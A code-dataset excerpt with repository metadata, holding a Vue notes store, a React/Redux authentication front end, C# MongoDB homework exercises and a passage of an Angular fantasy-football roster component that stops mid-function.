| branch_name | text | directory_id | languages | num_files | repo_language | repo_name | revision_id | snapshot_id |
|---|---|---|---|---|---|---|---|---|
| stringclasses (149 values) | stringlengths 23–89.3M | stringlengths 40 | listlengths 1–19 | int64 1–11.8k | stringclasses (38 values) | stringlengths 6–114 | stringlengths 40 | stringlengths 40 |
branch_name: refs/heads/master
<repo_name>alekseizhezvaev/vue-notes
<file_sep>/src/store/modules/note.js
import Vue from "vue";
import {
ADD_MESSAGE,
SET_NOTES,
DELETE_NOTE,
SET_GRID,
SET_SEARCH,
} from "../mutationTypes";
export default {
state: {
search: "",
message: false,
grid: true,
note: {
title: "",
descr: "",
priority: "general",
},
notes: [
{
title: "First Note",
descr: "Description for first note",
date: new Date().toLocaleString(),
priority: "important",
},
{
title: "Second Note",
descr: "Description for second note",
date: new Date().toLocaleString(),
priority: "general",
},
{
title: "Third Note",
descr: "Description for third note",
date: new Date().toLocaleString(),
priority: "general",
},
],
},
mutations: {
[ADD_MESSAGE](state, payload) {
Vue.set(state, "message", payload);
},
[SET_NOTES](state, payload) {
Vue.set(state, "notes", payload);
},
[DELETE_NOTE](state, payload) {
Vue.set(state, "notes", payload);
},
[SET_GRID](state) {
Vue.set(state, "grid", !state.grid);
},
[SET_SEARCH](state, payload) {
Vue.set(state, "search", payload);
},
},
actions: {
addNote({ commit, state }, options) {
const { title, descr, priority } = options;
const notes = [...state.notes];
if (!title) {
commit(ADD_MESSAGE, true);
return;
}
commit(ADD_MESSAGE, false);
if (priority === "important") {
notes.unshift({
title,
descr,
date: new Date(Date.now()).toLocaleString(),
priority,
});
commit("SET_NOTES", notes);
} else {
notes.push({
title,
descr,
date: new Date(Date.now()).toLocaleString(),
priority,
});
commit("SET_NOTES", notes);
}
},
deleteNote({ commit, state }, index) {
// Copy before splicing so state is only changed through the mutation.
const notes = [...state.notes];
notes.splice(index, 1);
commit(DELETE_NOTE, notes);
},
setSearchText({ commit }, searchText) {
commit(SET_SEARCH, searchText);
},
},
getters: {
getMessage(state) {
return state.message;
},
getNotes(state, { getSearchText }) {
let val = getSearchText;
if (!val) {
return state.notes;
}
// Normalize the query for case-insensitive matching
val = val.trim().toLowerCase();
// Keep notes whose title contains the query
return state.notes.filter((item) => item.title.toLowerCase().includes(val));
},
getGrid(state) {
return state.grid;
},
getSearchText(state) {
return state.search;
},
},
};
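// A minimal sketch of the "../mutationTypes" module imported above, which is
// not included in this file set; the constant values are assumed to mirror
// their names, as is conventional for Vuex mutation-type files.
// export const ADD_MESSAGE = "ADD_MESSAGE";
// export const SET_NOTES = "SET_NOTES";
// export const DELETE_NOTE = "DELETE_NOTE";
// export const SET_GRID = "SET_GRID";
// export const SET_SEARCH = "SET_SEARCH";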
<file_sep>/src/store/index.js
import Vue from "vue";
import Vuex from "vuex";
Vue.use(Vuex);
import node from "./modules/note";
export default new Vuex.Store({
modules: { node },
});
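// Usage sketch (assumed component code, not part of this repo): how a Vue
// component would drive the note module defined above.
// this.$store.dispatch("addNote", { title: "Milk", descr: "2l", priority: "important" });
// this.$store.dispatch("setSearchText", "milk");
// const visible = this.$store.getters.getNotes; // filtered by the search text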
directory_id: 3e448759a12c13c1c0edf39dbd93b5aad022bb9d
languages: ["JavaScript"]
num_files: 2
repo_language: JavaScript
repo_name: alekseizhezvaev/vue-notes
revision_id: fc722ed68372c2f0e666a41fac563bec3af50df9
snapshot_id: bda1b5a51e0ef01896df90e545322bbb43c0a364

branch_name: refs/heads/master
<file_sep>
export const appRoot = '/'
export const signIn = '/sign_in'
export const signUp = '/sign_up'
export const home = '/home'
<file_sep>
import React from 'react'
import { Redirect } from 'react-router-dom'
import PropTypes from 'prop-types'
import { connect } from 'react-redux'
import { isAuth } from 'selectors/auth'
import { currentPath } from 'selectors/router'
import { signIn, signUp, home } from 'constants/routes/ui'
const AuthCheck = ({ Component, isAuth, currentPath }) => {
if (!isAuth && [signIn, signUp].every(path => path !== currentPath)) {
return <Redirect to={signIn}/>
}
if (isAuth && [signIn, signUp].some(path => path === currentPath)) {
return <Redirect to={home} />
}
return <Component/>
}
const mapStateToProps = state => {
return {
isAuth: isAuth(state),
currentPath: currentPath(state)
}
}
AuthCheck.propTypes = {
Component: PropTypes.func.isRequired,
isAuth: PropTypes.bool.isRequired,
currentPath: PropTypes.string.isRequired
}
export default connect(mapStateToProps, null)(AuthCheck)
<file_sep>
import React, { Component } from 'react'
import { withStyles, Grid, TextField, Button, Paper, Typography } from '@material-ui/core'
import PropTypes from 'prop-types'
const emailRegExp = /^(([^<>()\[\]\.,;:\s@\"]+(\.[^<>()\[\]\.,;:\s@\"]+)*)|(\".+\"))@(([^<>()[\]\.,;:\s@\"]+\.)+[^<>()[\]\.,;:\s@\"]{2,})$/i
const emailErrorMsg = 'email is incorrect'
const passwordErrorMsg = 'password length cannot be less than 5 characters'
const styles = theme => ({
flexCenter: {
paddingTop: 'calc(56px + 10%)',
height: '100vh',
boxSizing: 'border-box'
},
formContainer: {
padding: theme.spacing.unit * 4,
width: '50%',
margin: '0 auto',
minWidth: 200,
maxWidth: 500
}
});
class AuthForm extends Component {
constructor(props){
super(props)
this.state = {
login: this.props.login,
password: this.props.password,
errors: {
login: '',
password: ''
}
}
this.validators = {
'login': (str) => emailRegExp.test(str) ? '' : emailErrorMsg,
'password': (str) => str.length >= 5 ? '' : passwordErrorMsg
}
}
handleSubmit = (event) => {
event.preventDefault();
this.props.handleSubmit({
login: this.state.login,
password: this.state.password
});
}
handleFieldChange = ({target}) => {
const errorMsg = this.validators[target.name](target.value)
this.setState(
prevState => ({
...prevState,
[target.name]: target.value,
errors: {
...prevState.errors,
[target.name]: errorMsg
}
})
)
}
renderServerError = () => {
if(this.props.errorResponse){
return(
<Grid item>
<Typography color='error'>
{this.props.errorResponse + '. Try again'}
</Typography>
</Grid>
)
}
}
isSubmitDisabled = () => {
return !this.state.login || !this.state.password || !!this.state.errors.login || !!this.state.errors.password
}
render(){
const { classes, btnText } = this.props;
const { errors } = this.state;
return (
<div className={classes.flexCenter}>
<Paper className={classes.formContainer}>
<form onSubmit={this.handleSubmit}>
<Grid container spacing={24} direction='column'>
<Grid item >
<TextField
name='login'
label="Login"
type='email'
error={!!errors['login']}
helperText={errors['login']}
fullWidth autoFocus required
onChange={this.handleFieldChange}
/>
</Grid>
<Grid item >
<TextField
name='password'
label="Password"
type="password"
error={!!errors['password']}
helperText={errors['password']}
fullWidth required
onChange={this.handleFieldChange}
/>
</Grid>
{ this.renderServerError() }
<Grid item >
<Button
variant="outlined"
color="primary"
style={{ textTransform: "none" }}
type='submit'
disabled={this.isSubmitDisabled()}
>
{btnText}
</Button>
</Grid>
</Grid>
</form>
</Paper>
</div>
)
}
}
AuthForm.defaultProps = {
login: '',
password: '',
btnText: 'Submit'
}
AuthForm.propTypes = {
btnText: PropTypes.string,
password: PropTypes.string,
errorResponse: PropTypes.string,
login: PropTypes.string,
classes: PropTypes.object
}
export default withStyles(styles)(AuthForm)
<file_sep>
import React, { Component } from 'react';
import { Route, Switch, Redirect } from 'react-router-dom';
import { ConnectedRouter } from 'connected-react-router';
import { bindActionCreators } from 'redux'
import { connect } from 'react-redux'
import * as routes from 'constants/routes/ui';
import { getAuthUserRequest } from 'actions/auth'
import HomePage from 'containers/HomePage';
import history from './history';
import SignInPage from 'containers/SignInPage';
import SignUpPage from 'containers/SignUpPage';
import AuthCheck from 'containers/AuthCheck';
import {isUserLoading} from 'selectors/auth';
import {CircleLoader} from 'react-spinners';
import PropTypes from 'prop-types';
import './App.css';
const loaderWrpStyles = {
position: 'absolute',
left: 'calc(50% - 75px)',
top: 'calc(40% - 75px)'
}
class App extends Component {
componentDidMount(){
localStorage.getItem('token') && this.props.actions.getAuthUserRequest()
}
renderApp(){
return (
<ConnectedRouter history={history}>
<Switch>
<Route path={routes.signUp} render={ () => <AuthCheck Component={SignUpPage}/> }/>
<Route path={routes.signIn} render={ () => <AuthCheck Component={SignInPage}/> }/>
<Route path={routes.home} render={ () => <AuthCheck Component={HomePage}/> }/>
<Redirect to={routes.home} />
</Switch>
</ConnectedRouter>
);
}
renderSpinner(){
return (
<div style={loaderWrpStyles}>
<CircleLoader
sizeUnit={"px"}
size={150}
color={'#36D7B7'}
/>
</div>
)
}
render() {
return this.props.isUserLoading
? this.renderSpinner()
: this.renderApp()
}
}
const mapStateToProps = (state) => ({
isUserLoading: isUserLoading(state)
})
const mapDispatchToProps = (dispatch) => ({
actions: bindActionCreators({
getAuthUserRequest
}, dispatch)
})
App.propTypes = {
isUserLoading: PropTypes.bool.isRequired,
actions: PropTypes.shape({
getAuthUserRequest: PropTypes.func.isRequired
})
}
export default connect(mapStateToProps, mapDispatchToProps)(App);
<file_sep>
export const start = (actionType) => `START__${actionType}`;
export const success = (actionType) => `SUCCESS__${actionType}`;
export const fail = (actionType) => `FAIL__${actionType}`;
export const startActionWithType = (type, payload) => ({
type: start(type),
payload
})
export const successActionWithType = (type, payload) => ({
type: success(type),
payload
})
export const failActionWithType = (type, error, status ) =>({
type: fail(type),
error,
status
})
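// Usage sketch (hypothetical action type and payload, for illustration only):
//   start('SIGN_IN')                        -> 'START__SIGN_IN'
//   startActionWithType('SIGN_IN', creds)   -> { type: 'START__SIGN_IN', payload: creds }
//   failActionWithType('SIGN_IN', 'Unauthorized', 401)
//     -> { type: 'FAIL__SIGN_IN', error: 'Unauthorized', status: 401 }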
<file_sep>
import { success, start, fail } from 'helpers/actionProcessTemplaters'
import * as types from 'constants/actionTypes/auth'
const initialState = {
user: {},
isAuth: false,
isAuthorizing: false, // will be used for a form spinner in the future
isUserLoading: false,
errorResponse: null
}
const auth = (state = initialState, action) => {
switch(action.type){
case( success(types.SIGN_IN) ):
case( success(types.SIGN_UP) ):
return {
...state,
isAuthorizing: false,
isAuth: true,
}
case( success(types.GET_AUTH_USER) ):
return {
...state,
isUserLoading: false,
user: action.payload,
isAuth: true
}
case( start(types.GET_AUTH_USER) ):
return {
...state,
isUserLoading: true
}
case( start(types.SIGN_IN) ):
case( start(types.SIGN_UP) ):
return {
...state,
isAuthorizing: true
}
case( fail(types.GET_AUTH_USER) ):
return {
...state,
isUserLoading: false
}
case( fail(types.SIGN_IN) ):
case( fail(types.SIGN_UP) ):
return {
...state,
isAuthorizing: false,
errorResponse: action.error
}
case( types.CLEAR_AUTH_ERRORS ):
return {
...state,
errorResponse: null
}
default: return state
}
}
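// Usage sketch (hypothetical payloads, for illustration only): one sign-in
// round trip through this reducer, using the templaters from
// helpers/actionProcessTemplaters.
//   auth(undefined, startActionWithType(types.SIGN_IN))
//     -> { ...initialState, isAuthorizing: true }
//   auth(state, successActionWithType(types.SIGN_IN))
//     -> { ...state, isAuthorizing: false, isAuth: true }
//   auth(state, failActionWithType(types.SIGN_IN, 'Unauthorized', 401))
//     -> { ...state, isAuthorizing: false, errorResponse: 'Unauthorized' }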
export default auth
<file_sep>
export const signUp = '/auth'
export const signIn = '/login'
export const getAuthUser = '/user'
<file_sep>
export const SIGN_IN = 'SIGN_IN'
export const SIGN_UP = 'SIGN_UP'
export const LOGOUT = 'LOGOUT'
export const GET_AUTH_USER = 'GET_AUTH_USER'
export const CLEAR_AUTH_ERRORS = 'CLEAR_AUTH_ERRORS'
<file_sep>
export const isAuth = ({auth}) => auth.isAuth
export const isUserLoading = ({auth}) => auth.isUserLoading
export const isAuthorizing = ({auth}) => auth.isAuthorizing
export const authUser = ({auth}) => auth.user
export const errorResponse = ({auth}) => auth.errorResponse
<file_sep>
import React, {Component} from 'react'
import { bindActionCreators } from 'redux'
import AuthForm from 'components/AuthForm'
import AuthFormHeader from 'components/AuthFormHeader'
import { signInRequest, clearAuthErrors } from 'actions/auth'
import { connect } from 'react-redux'
import { signUp } from 'constants/routes/ui'
import { errorResponse } from 'selectors/auth'
import PropTypes from 'prop-types'
class SignInPage extends Component {
componentWillUnmount(){
this.props.actions.clearAuthErrors()
}
render(){
return(
<div>
<AuthFormHeader
headerText={'Sign In'}
linkText={"I don't have an account"}
linkPath={signUp}
/>
<AuthForm
handleSubmit={this.props.actions.signInRequest}
btnText='Sign in'
errorResponse={this.props.errorResponse}
/>
</div>
)
}
}
const mapStateToProps = (state) => ({
errorResponse: errorResponse(state),
})
const mapDispatchToProps = (dispatch) => ({
actions: bindActionCreators({
signInRequest,
clearAuthErrors
}, dispatch)
})
SignInPage.propTypes = {
errorResponse: PropTypes.string,
actions: PropTypes.shape({
signInRequest: PropTypes.func.isRequired,
clearAuthErrors: PropTypes.func.isRequired,
})
}
export default connect(mapStateToProps, mapDispatchToProps)(SignInPage)
<file_sep>
export const currentPath = ({router}) => router.location.pathname
directory_id: 08a43a1e20db28744b6c674bd9da4ec11c39b76f
languages: ["JavaScript"]
num_files: 11
repo_language: JavaScript
repo_name: Kadaverin/incode
revision_id: f8c7c0166791e842db946b43a390cd223721205a
snapshot_id: b8f96500d08231425b8264204ad2726a8ce62152

branch_name: refs/heads/master
<file_sep>
using System;
using System.Linq;
using System.Threading.Tasks;
using MongoDB.Bson;
using MongoDB.Bson.Serialization.Attributes;
using MongoDB.Driver;
namespace MongoPractice
{
/// <summary>
/// copied from mongodb university
/// </summary>
public class HW2_1
{
/*Write a program in the language of your choice that will remove the grade of type "homework" with the lowest
* score for each student from the dataset in the handout. Since each document is one grade, it should remove one document per student.
* This will use the same data set as the last problem, but if you don't have it, you can download and re-import.
The dataset contains 4 scores each for 200 students.
First, let's confirm your data is intact; the number of documents should be 800.
use students
db.grades.count()
Hint/spoiler: If you select homework grade-documents, sort by student and then by score, you can iterate through and find
the lowest score for each student by noticing a change in student id. As you notice that change of student_id, remove the document.
To confirm you are on the right track, here are some queries to run after you process the data and put it into the grades collection:
Let us count the number of grades we have:
db.grades.count()
The result should be 600. Now let us find the student who holds the 101st best grade across all grades:
db.grades.find().sort( { 'score' : -1 } ).skip( 100 ).limit( 1 )
The correct result will be:
{ "_id" : ObjectId("50906d7fa3c412bb040eb709"), "student_id" : 100, "type" : "homework", "score" : 88.50425479139126 }
Now let us sort the students by student_id , and score, while also displaying the type to then see what the top five docs are:
db.grades.find( { }, { 'student_id' : 1, 'type' : 1, 'score' : 1, '_id' : 0 } ).sort( { 'student_id' : 1, 'score' : 1 } ).limit( 5 )
The result set should be:
{ "student_id" : 0, "type" : "quiz", "score" : 31.95004496742112 }
{ "student_id" : 0, "type" : "exam", "score" : 54.6535436362647 }
{ "student_id" : 0, "type" : "homework", "score" : 63.98402553675503 }
{ "student_id" : 1, "type" : "homework", "score" : 44.31667452616328 }
{ "student_id" : 1, "type" : "exam", "score" : 74.20010837299897 }
To verify that you have completed this task correctly, provide the identity of the student with the highest average in the class with
following query that uses the aggregation framework. The answer will appear in the _id field of the resulting document.
db.grades.aggregate( { '$group' : { '_id' : '$student_id', 'average' : { $avg : '$score' } } }, { '$sort' : { 'average' : -1 } }, { '$limit' : 1 } )
Enter the student ID below. Please enter just the number, with no spaces, commas or other characters.
*/
public static void Main(string[] args)
{
MainAsync(args).Wait();
Console.ReadKey();
}
static async Task MainAsync(string[] args)
{
var client = new MongoClient();
var db = client.GetDatabase("m101");
var collection = db.GetCollection<Grade>("hw22");
// no student has a negative id, so we'll use that as a safe starting
// point
int currentStudentId = -1;
// Find all the homeworks, sort by StudentId and then Score.
await collection
.Find(x => x.Type == GradeType.homework)
.SortBy(x => x.StudentId).ThenBy(x => x.Score)
.ForEachAsync(async grade =>
{
if (grade.StudentId != currentStudentId)
{
currentStudentId = grade.StudentId;
// The first grade for each student will always be their lowest,
// so delete it...
await collection.DeleteOneAsync(x => x.Id == grade.Id);
}
});
// We haven't gotten to this part in the class yet, but it's the
// translation of the aggregation query from the instructions into .NET.
var result = await collection.Aggregate()
.Group(x => x.StudentId, g => new { StudentId = g.Key, Average = g.Average(x => x.Score) })
.SortByDescending(x => x.Average)
.FirstAsync();
Console.WriteLine(result);
}
private class Grade
{
public ObjectId Id { get; set; }
[BsonElement("student_id")]
public int StudentId { get; set; }
[BsonElement("type")]
[BsonRepresentation(BsonType.String)]
public GradeType Type { get; set; }
[BsonElement("score")]
public double Score { get; set; }
}
public enum GradeType
{
homework,
exam,
quiz
}
}
}
<file_sep>
using MongoDB.Bson;
using MongoDB.Driver;
using MongoDB;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace MongoPractice
{
//class Program
//{
// static void Main(string[] args)
// {
// MainAsync(args).Wait();
// Console.WriteLine("Press Enter");
// Console.ReadLine();
// }
// static async Task MainAsync(string[] args)
// {
// //ConnectionString
// var connectionString = "mongodb://localhost:27017";
// //First create the client. A singleton in an IoC container or a
// //static instance like this are good approaches
// var client = new MongoClient(connectionString);
// //Both the db and col are thread safe so they, like the client, can be stored globally
// var db = client.GetDatabase("school");
// var col = db.GetCollection<BsonDocument>("students");
// //Method 1
// #region one way to build a collection
// //using (var cursor = await col.Find(new BsonDocument()).ToCursorAsync())
// //{
// // while (await cursor.MoveNextAsync())
// // {
// // foreach (var student in cursor.Current)
// // {
// // if (true)
// // {
// // }
// // Console.WriteLine(student);
// // }
// // }
// //}
// #endregion
// //Method 2, store in memory as list
// #region another way to build a collection
// //var list = await col.Find(new BsonDocument()).ToListAsync();
// //foreach (var doc in list)
// //{
// // Console.WriteLine(doc);
// //}
// #endregion
// //Method 3
// #region Final way to build a collection
// //For each document, run the callback method passed into the ForEachAsync
// //await col.Find(new BsonDocument()).ForEachAsync(doc => Console.WriteLine(doc));
// #endregion
// }
//}
}
<file_sep>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using MongoDB;
using MongoDB.Bson;
using MongoDB.Bson.Serialization.Attributes;
using MongoDB.Driver;
namespace MongoPractice
{
public class HW3
{
//This homework task uses students.json as a mongo database.
//Importable by cmd: mongoimport --drop -d school -c students filelocation\students.json
//The task is to remove the lowest homework grade from each student, then to find the student with the highest average (all grade types) after dropping the lowest homework.
//Answer: _id = 13
public static void Main(string[] args)
{
MainAsync(args).Wait();
Console.ReadKey();
}
public static async Task MainAsync(string[] args)
{
var client = new MongoClient();
var db = client.GetDatabase("school");
var col = db.GetCollection<Student>("students");
await col.Find(new BsonDocument()).ForEachAsync(async student =>
{
//First get the lowest HW grade by matching the student grade to the gradetype 'homework',
//Then sort the homeworks by score, default is lowest to highest
//Finally the first() grabs the first(lowest) homework and stores it in memory as 'lowestHomeworkGrade'
var lowestHomeworkGrade = student.Grades
.Where(x => x.Type == GradeType.homework)
.OrderBy(x => x.Score).First();
//Then, there are many ways to remove and update the grades array on the student object/document
//option 1: remove it server-side
//await col.UpdateOneAsync
//(
// filter: x => x.Id == student.Id,
// update: Builders<Student>.Update.PullFilter
// (
// field: x => x.Grades,
// filter: score => score.Score == lowestHomeworkGrade.Score && score.Type == GradeType.homework
// )
//);
//option 2: remove it client-side and replace only the scores
//student.Grades.Remove(lowestHomeworkGrade);
//await col.UpdateOneAsync
// (
// filter: x => x.Id == student.Id,
// update: Builders<Student>.Update.Set(x => x.Grades, student.Grades)
// );
//option3: Remove it Client-side and replace the whole student
student.Grades.Remove(lowestHomeworkGrade);
await col.ReplaceOneAsync
(
filter: x => x.Id == student.Id,
replacement: student
);
});
// Translation of the aggregation query: average out the remaining grades, sort from highest to lowest average, then return the first (highest) one.
var result = await col.Aggregate()
.Unwind(x => x.Grades)
.Group(new BsonDocument {
{"_id", "$_id" },
{ "average", new BsonDocument("$avg","$scores.score")}
})
.Sort(new BsonDocument("average", -1))
.FirstAsync();
Console.WriteLine(result);
}
private class Student
{
public int Id { get; set; }
[BsonElement("name")]
public string Name { get; set; }
[BsonElement("scores")]
public List<Grade> Grades { get; set; }
}
private class Grade
{
[BsonElement("type")]
[BsonRepresentation(BsonType.String)]
public GradeType Type {get; set;}
[BsonElement("score")]
public double Score { get; set; }
}
public enum GradeType
{
homework,
exam,
quiz
}
}
}
directory_id: bcbaeb89d9d0dfe9c9b8bea398898d9c0c7e8e30
languages: ["C#"]
num_files: 3
repo_language: C#
repo_name: KWJ2010/MongoPractice
revision_id: 6eb3c36b6c9e6185b6932fb724252412deb53d50
snapshot_id: 9d6c83d4ff45d82678d0ac3e04447611b6c0a5ab

branch_name: refs/heads/master
<file_sep>
import { Component, OnInit, AfterViewInit, ElementRef, Renderer2, ViewChild, Input } from '@angular/core';
import { forkJoin } from 'rxjs';
import { switchMap, switchAll, flatMap } from 'rxjs/operators';
import { Router } from '@angular/router';
import { Player } from '../shared/player';
import { Team } from '../shared/team';
// import { PLAYERS } from '../player_list';
import { TeamService } from "../services/team.service";
import { PlayerService } from "../services/player.service";
@Component({
selector: 'app-players',
templateUrl: './players.component.html',
styleUrls: ['./players.component.css'],
})
export class PlayersComponent implements OnInit, AfterViewInit {
players: Player[];
player: Player;
teams: Team[] = [];
team: Team;
player_array: any[] = [];
team_name: string;
search: string;
@ViewChild('playerList')
private el: ElementRef;
constructor(private renderer: Renderer2, private teamService: TeamService, private playerService: PlayerService, private router: Router) { }
ngOnInit() {
this.getPlayers();
this.teamService.currentTeam
.subscribe(team => this.team = team);
this.teamService.getTeams()
.subscribe(teams => this.teams = teams);
}
ngAfterViewInit() {
}
getPlayers() {
this.playerService.getPlayers()
.subscribe(players => this.players = players);
}
compareFn(t1: Team, t2: Team): boolean {
return t1 && t2 ? t1.id === t2.id : t1 === t2;
}
searchFn(event: any) {
// variables for saving search string and list items
let filter = this.search.toUpperCase();
let ul = document.getElementById('player_list');
let li = ul.getElementsByTagName('li');
// loop through all list items, and hide those who don't match the search query
for (let i=0; i < li.length; i++) {
let name = li[i].getElementsByTagName('p')[0];
let position = li[i].getElementsByTagName('p')[1];
let team = li[i].getElementsByTagName('p')[2];
if (name.innerHTML.toUpperCase().indexOf(filter) > -1) {
li[i].style.display = "";
}
else if (position.innerHTML.toUpperCase().indexOf(filter) > -1) {
li[i].style.display = "";
}
else if (team.innerHTML.toUpperCase().indexOf(filter) > -1) {
li[i].style.display = "";
}
else {
li[i].style.display = "none";
}
}
}
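// A hedged alternative sketch (not this component's actual approach): filter
// the bound players array and let *ngFor re-render, instead of toggling
// display styles on DOM nodes queried by id.
// filteredPlayers(): Player[] {
//   const q = (this.search || '').toUpperCase();
//   return this.players.filter(p =>
//     [p.name, p.position, p.team].some(f => f.toUpperCase().includes(q)));
// }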
clickPlayer(event: any) {
event.stopPropagation();
event.preventDefault();
let player_html = event.currentTarget.innerHTML;
// console.log(player_html);
let player_name = event.currentTarget.children[1].innerHTML.trim();
console.log(player_name);
if (player_html.indexOf('- QB') != -1 && !document.getElementById('p-1').innerHTML.includes('- QB')) {
let player_li = this.el.nativeElement.children[0];
// copy player into roster list
document.getElementById('p-1').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p1-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let QB = this.renderer.createText('QB');
this.renderer.appendChild(p, QB)
this.renderer.appendChild(player_li, p);
});
}
else if (player_html.indexOf('- RB') != -1 && document.getElementById('p-2').innerHTML.includes('RB1') && document.getElementById('p-3').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-6').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[1];
// copy player into roster list
document.getElementById('p-2').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p2-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let RB1 = this.renderer.createText('RB1');
this.renderer.appendChild(p, RB1);
this.renderer.appendChild(player_li, p);
});
}
else if (player_html.indexOf('- RB') != -1 && document.getElementById('p-3').innerHTML.includes('RB2') && document.getElementById('p-2').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-6').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[2];
// copy player into roster list
document.getElementById('p-3').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p3-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let RB2 = this.renderer.createText('RB2');
this.renderer.appendChild(p, RB2);
this.renderer.appendChild(player_li, p);
});
}
else if (player_html.indexOf('- WR') != -1 && document.getElementById('p-4').innerHTML.includes('WR1') && document.getElementById('p-5').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-6').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[3];
// copy player into slot in table
document.getElementById('p-4').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p4-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let WR1 = this.renderer.createText('WR1');
this.renderer.appendChild(p, WR1);
this.renderer.appendChild(player_li, p);
});
}
else if (player_html.indexOf('- WR') != -1 && document.getElementById('p-5').innerHTML.includes('WR2') && document.getElementById('p-4').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-6').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[4];
// copy player into roster list
document.getElementById('p-5').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p5-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let WR2 = this.renderer.createText('WR2');
this.renderer.appendChild(p, WR2);
this.renderer.appendChild(player_li, p);
});
}
else if (player_html.indexOf('- TE') != -1 && !document.getElementById('p-7').innerHTML.includes('- TE') && document.getElementById('p-6').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[6];
// copy player into roster list
document.getElementById('p-7').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p7-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let TE = this.renderer.createText('TE');
this.renderer.appendChild(p, TE);
this.renderer.appendChild(player_li, p);
});
}
else if ((player_html.indexOf('- RB') != -1 || player_html.indexOf('- WR') != -1 || player_html.indexOf('- TE') != -1) && !document.getElementById('p-6').innerHTML.includes('- RB') && !document.getElementById('p-6').innerHTML.includes('- WR') && !document.getElementById('p-6').innerHTML.includes('- TE') && document.getElementById('p-2').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-3').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-4').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-5').innerHTML.indexOf(player_name) == -1 && document.getElementById('p-7').innerHTML.indexOf(player_name) == -1) {
let player_li = this.el.nativeElement.children[5];
// copy player into roster list
document.getElementById('p-6').innerHTML = player_html;
// create delete button and attach to player
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.setAttribute(delete_player, 'id', 'p6-del');
this.renderer.addClass(delete_player, 'delete_player');
this.renderer.appendChild(player_li, delete_player);
// remove player elements and delete button, add text
this.renderer.listen(delete_player, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let WRT = this.renderer.createText('RB/WR/TE');
this.renderer.appendChild(p, WRT);
this.renderer.appendChild(player_li, p);
});
}
}
saveTeam(event: any) {
// get all list items in team list
let player_nodes = document.getElementById('roster_list').querySelectorAll('img');
if (player_nodes.length >= 7) {
// set team variables
let team_id = this.teams.length == 0 ? 1 : Math.max(...this.teams.map(team => team.id)) + 1;
let team_name = this.team_name;
console.log(this.team_name);
let team_date = new Date();
// get selected players
let player_elements = document.getElementById('roster_list').getElementsByTagName('li');
// push player ids from HTML collection into array
let playerid_array = [];
for (let i=0; i < player_elements.length; i++) {
playerid_array.push(player_elements[i].children[1].id);
};
// call getPlayer method from player service and push retrieved player observables into observables array
let observables = [];
for (let i=0; i < playerid_array.length; i++) {
observables.push(this.playerService.getPlayer(playerid_array[i]));
}
// subscribe to player observables, create team object
forkJoin(observables)
